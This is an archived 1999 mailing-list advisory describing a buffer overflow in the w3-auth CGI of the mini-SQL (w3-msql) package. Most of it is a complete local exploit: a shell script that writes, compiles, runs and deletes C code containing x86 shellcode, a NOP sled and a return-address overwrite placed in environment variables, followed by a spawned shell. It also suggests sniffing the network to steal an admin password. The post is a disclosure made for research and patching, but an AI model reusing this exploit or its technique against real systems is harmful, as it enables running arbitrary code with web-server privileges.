hi,
i was looking for an exploitable buffer overflow in w3-msql
(from Hughes Technology) since there was many security flaws
inside.
There is a static variable named PrivateScript in main()
function with a 255 chars size length.
No luck ! main() finish everywhere with an exit() call.
The http internal server error produced with a big URI
string (about 260 chars) is the fact of the modification of
environments pointers in the stack just behind the return
adress and argvs pointers.
So the syscall getenv() produce a signal 11.
No mind ! just take a look now in w3-auth.c :)
and more specially in parseArgs().
there is a static array of 30 chars named "var" and the
function exit with a return.
this is ok !
It 's now possible to force remotly w3-auth cgi-bin to
execute everything with httpd user priviledge (and may be,
to modify everything in the web server)
However to exploit this hole, attacker has to be
authenticated by the cgi (the web server has to set
HTTP_AUTHORIZATION environment var).
So there are two ways to use this exploit:
1- the hacker is an official msql database admin but without
httpd priviledge (naturally !)
2- the hacker starts by sniffing the network segment, steals
an admin password and modify remotly the web server.
now the script (local version only, just the necessary time
for Hughes to patch the source)
#!/bin/sh
cat > ./w3-3gg.c << _EOEXPLOIT
/*******************************
*****************
Local Linux exploit for
w3-auth
Authentication module from mini-sql package
Gregory Duchemin Aka c3RbeR
Neurocom -- Mai 1999
E-mail: gdnat_private
******************
********************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/param.h>
#include <stdarg.h>
#define GREEN "\033[1;32m"
#define RED "\033[1;31m"
#define NORM "\033[1;39m"
#define NOP 0x90
char *EGG;
char *bob;
long *ret;
int size;
long StackPointer();
int usage(char *);
void Thisistheend(long);
/*
Shellk0de from the great Phr4ck Ezine
*/
char shell[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x5
6\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd
1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
int main (int argc, char *argv[]){
int cnt;
unsigned long sp;
int dec;
sp = cnt = 0;
if (argc>=4) usage(argv[0]);
size=250;
if (argc>=2) size=atoi(argv[1]);
dec=15;
if (argc>=3) dec=atoi(argv[2]);
sp=StackPointer();
sp-=dec;
printf("%s\n Using buffer size = %d, return adress = %02X
with stack offset =
%d\n\n", GREEN, size, sp, dec);
Thisistheend(sp);
}
/* Wh3re is my Stack P0inter ? Ask the esp registry... */
long StackPointer()
{
__asm__("movl %esp, %eax\n");
}
int usage (char *name)
{
printf("%s Usage:%s [size] [offset] \n",RED,name);
printf("Default: %s 250 15 \n %s",name, NORM);
exit(1);
}
void Thisistheend (long sp)
{
int cnt;
if (!(EGG=(char *)malloc(size)))
{
perror("Malloc error\n\n");
exit(1);
}
/* First Step....filling buffer with NoOperation */
for(cnt=0;cnt<(size-1);cnt++)
*(EGG+cnt)=NOP;
/* Next, insert your own code */
bob=EGG+80;
for (cnt=0; cnt<strlen(shell); cnt++)
*(bob++)=*(shell+cnt);
/* Then, your return adress in the stack to point toward the
shell code */
ret = (unsigned long *) (EGG+36);
*(ret)=sp;
EGG[size-1]='\0';
/*
apache set this env variables
Note: "Http authentication" means that script kiddy'll have
to get a pass
*/
setenv("REQUEST_METHOD", "GET", 1);
setenv("HTTP_USER_AGENT", EGG, 1);
setenv("QUERY_STRING", EGG, 1);
/* Simulate a good authentication localy */
setenv("HTTP_AUTHORIZATION", "1", 1);
system("/bin/sh -c \"echo -e \'\nReady to fight captain
!\n\nLook at the env(s) and
...\n\nJust launch w3-auth and see...\n\n\n\'\"");
system("/bin/sh");
}
_EOEXPLOIT
gcc ./w3-3gg.c -o ./w3-3gg
echo -e "\n\n Script started \n\n"
./w3-3gg
rm ./w3-3gg ./w3-3gg.c
-------------------------------
Gregory Duchemin
Security Engineer
NEUROCOM
179-181 Av Charles de Gaulle
92200 Neuilly sur Seine
Tel: 01 41 43 84 84
Fax: 01 41 43 84 80
E-mail: gdnat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:06:08 PDT